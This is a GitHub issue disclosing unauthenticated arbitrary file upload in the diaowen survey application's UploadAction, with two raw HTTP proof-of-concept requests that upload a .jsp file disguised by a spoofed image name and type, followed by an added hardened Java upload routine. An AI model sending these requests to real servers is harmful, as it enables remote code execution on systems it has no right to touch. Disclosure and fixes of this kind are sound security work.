Arbitrary file uploads exist #107

Open
a02goblin opened this issue Aug 18, 2023 · 1 comment

@a02goblin

The saveimage and saveFile methods in the com/key/common/base/action/UploadAction.java file can directly upload any type of file without authorization.

For the saveimage method, this method can be called directly without authorization to upload any specified type of file to the /file/images/ directory, and this directory can be accessed normally through a browser, so malicious files can be uploaded for remote code execution.

```http
POST /diaowen/up/upload!saveimage.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Connection: close
Content-Length: 395
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde
Accept-Encoding: gzip, deflate

------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"
Content-Type: image/jpeg

testnixxx
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg
------WebKitFormBoundary12345abcde--
```

Similarly, for the saveFile method, this method can also be called directly without authorization to upload any specified type of file to the directory specified by basepath under the /file directory, and this directory can be accessed normally through the browser, so malicious files can be uploaded for remote code execution.

```http
POST /diaowen/up/upload!saveFile.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Connection: close
Content-Length: 489
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde
Accept-Encoding: gzip, deflate

------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="basepath"

files
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"
Content-Type: image/jpeg

testnixxx
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg
------WebKitFormBoundary12345abcde--
```
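
A hardened upload routine addressing the two problems reported above (no authorization check, and a file type that can be declared by client-supplied fields), as an added example that is not code from the project or from the reporter. The class and method names, the upload directory and the image-only allowlist are assumptions.

```java
import java.io.*;
import java.nio.file.*;
import java.util.*;

// Added illustration (Java 11+). Class, method and path names are hypothetical.
public class SafeUpload {
    // Assumption: only image uploads are intended.
    static final Set<String> ALLOWED_EXT = Set.of("jpg", "jpeg", "png", "gif");
    // Assumption: placeholder directory outside the web root, so stored files are never executed.
    static final Path UPLOAD_ROOT = Paths.get("/var/app-data/uploads");

    // authenticated: outcome of the application's own session check.
    // basepath:      client-supplied sub-directory (the "basepath" form field).
    // partFilename:  filename of the file part itself, not the "uploadifyFileName" field.
    public static Path store(boolean authenticated, String basepath,
                             String partFilename, InputStream body) throws IOException {
        if (!authenticated) throw new SecurityException("login required");

        // Decide the type from the file part; the declared name and content type
        // are client-controlled ("1.jpg" / "image/jpeg" accompanied "1.jsp" above).
        String name = partFilename == null ? "" : partFilename;
        int dot = name.lastIndexOf('.');
        String ext = dot < 0 ? "" : name.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED_EXT.contains(ext)) throw new IllegalArgumentException("file type not allowed");

        // Confine basepath to the upload root; "../" and absolute paths are rejected.
        Path dir = UPLOAD_ROOT.resolve(basepath == null ? "" : basepath).normalize();
        if (!dir.startsWith(UPLOAD_ROOT)) throw new IllegalArgumentException("invalid basepath");

        // The content must start with a JPEG, PNG or GIF signature.
        byte[] head = body.readNBytes(4);
        if (!(sig(head, 0xFF, 0xD8, 0xFF) || sig(head, 0x89, 'P', 'N', 'G') || sig(head, 'G', 'I', 'F', '8')))
            throw new IllegalArgumentException("content is not an image");

        // Store under a server-generated name; never reuse a client-supplied one.
        Files.createDirectories(dir);
        Path target = dir.resolve(UUID.randomUUID() + "." + ext);
        try (OutputStream out = Files.newOutputStream(target, StandardOpenOption.CREATE_NEW)) {
            out.write(head);
            body.transferTo(out);
        }
        return target;
    }

    private static boolean sig(byte[] h, int... s) {
        if (h.length < s.length) return false;
        for (int i = 0; i < s.length; i++) if ((h[i] & 0xFF) != s[i]) return false;
        return true;
    }
}
```

With these checks, both requests shown above are rejected at the extension test, because the file part is named `1.jsp` regardless of what `uploadifyFileName` and `uploadifyContentType` declare.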

@easyandeasy

easyandeasy commented Aug 18, 2023 via email
